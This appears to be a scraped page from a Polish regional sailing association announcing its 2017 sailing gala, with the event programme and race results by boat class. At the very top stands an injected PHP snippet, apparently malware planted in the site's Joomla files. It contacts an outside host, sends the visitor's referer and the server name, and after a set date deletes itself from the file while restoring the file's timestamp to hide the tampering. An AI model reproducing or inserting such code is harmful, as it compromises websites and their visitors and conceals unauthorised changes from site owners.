check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } GALA WOZŻ 2017

Witamy na stronie
Wielkopolskiego Okręgowego Związku Żeglarskiego !!!

Home Aktualności GALA WOZŻ 2017

ZAPRASZAMY NA
WIELKOPOLSKĄ GALĘ ŻEGLARSKĄ 2017

Gala odbędzie się w dniu 17 listopada 2017 o godz. 18.30
w auli /A004 parter/ Collegium Da Vinci, ul. Gen. Kutrzeby 10.

PROGRAM:

  1. Rozpoczęcie uroczystości i przywitanie gości

  2. Ogłoszenie wyników i wręczenie Nagrody Roku ZŁOTA OMEGA 2017 w

    kategoriach: Osiągnięcie Sportowe Roku, Morski Rejs Roku,

    Śródlądowy Rejs Roku, Regaty Roku, Impreza – Wydarzenie Roku,

    Przystań Żeglarska Roku

  3. Wręczenie odznaczeń „Za zasługi dla Żeglarstwa Wielkopolskiego”

  4. Wystąpienie przedstawicieli Floty Zachodniej DN z okazji 50-lecia klasy

    DN w Polsce.

  5. Ogłoszenie wyników i wręczenie Pucharów Prezesa WOZŻ w klasach

    sportowych Optimist, BiC Techno, RS:X, Europa, Laser 4,7,

    Laser Radial, Laser Standard, Słonka, OK Dinghy,

    Finn oraz klasyfikacji klubowej za sezon 2017

  6. Ogłoszenie wyników i wręczenie Pucharów Prezesa WOZŻ

    w klasach sportowo-rekreacyjnych T-1, T-2, T-3, T-R i Omega za sezon 2017

  7. Wręczenia nagród dla armatorów jachtów za zdobyte punkty w końcowej klasyfikacji

  8. Ogłoszenie wyników i wręczenie pucharów za regaty Błękitna Wstęga Jeziora Kierskiego.


Wjazd na parking od ul. Na Podgórnik

 

WYNIKI


Finn


1 JAROCKI Marek AZS Poznań

2 REICHELT Juliusz ŻLKS Poznań

3 ROMANOWSKI Andrzej AZS Poznań


OKD

1 PAWLACZYK Paweł JKW Poznań

2 KUJAWIŃSKI Donat AZS Poznań

3 PAWŁOWSKI Dominik AZS Poznań


Laser standard

1 MARCINIAK Jakub JKW Poznań

2 ŻEBERSKI Patryk PKM Lok Poznań

3 POLACZYK Hubert KŻ Mewa Poznań


BICTECHNO

1 WAWRZYNIAK Pola AZS Poznań

2 ŚWIĄTKOWSKI Jakub AZS Poznań

3 BANACH Agata AZS Poznań


RS:X

1 CZURYŁO Zuzanna AZS Poznań

2 PAWŁOWSKI Kajetan AZS Poznań

3 POPŁONYK Marta AZS Poznań


OPP CHŁOPCY

1 MŁODZIANOWSKI KACPER AZS POZNAŃ

2 MARCINIAK STEFAN AZS POZNAŃ

3 SOPATA ANTONI AZS POZNAŃ

4 ROSSA SZYMON ŻMKS

5 GRZESIEK MICHAŁ ŻMKS POZNAŃ

6 KORCZ KACPER ŻMKS POZNAŃ


OPP DZIEWCZĘTA

1 WISZNIOWSKA HANNA JKW POZNAŃ

2 POSPIESZNA ZOFIA AZS POZNAŃ

3 GAJDZIŃSKA KAROLINA AZS POZNAŃ

4 BORUCKA ALEKSANDRA AZS POZNAŃ

5 PRZYBYŁEK ALICJA AZS POZNAŃ

6 WITCZAK ANNA ŻLKS KIEKRZ


SŁONKA

1

SOKOŁOWSKI Łukasz

SOKOŁOWSKI Piotr

ŻLKS Poznań

2

MARCZAK Dawid

PĘDZIŃSKI Bartosz

ŻLKS Poznań

3

POLACZYK Szymon

POLACZYK Sylwia

KŻ MEWA P-ń


LASER RADIAL

1 POLACZYK Hubert KŻ Mewa

2 KOTOWSKI Wojciech ŻMKS Poznań

3 MICHALSKA Anna PKM LOK POZNAŃ


LASER 4,7

1 POLACZYK Gerard KŻ Mewa

2 ŚLUSARSKA Nawojka KŻ Mewa

3 SZUBERT Rafał ŻMKS Poznań

 


KLUBOWO

 

AZS POZNZŃ

ŻMKS POZNZŃ

JKW POZNZŃ

 

 

 

 

 

 

 

 

Poznań Know How

Energa Sailing

Przeszukaj nasz serwis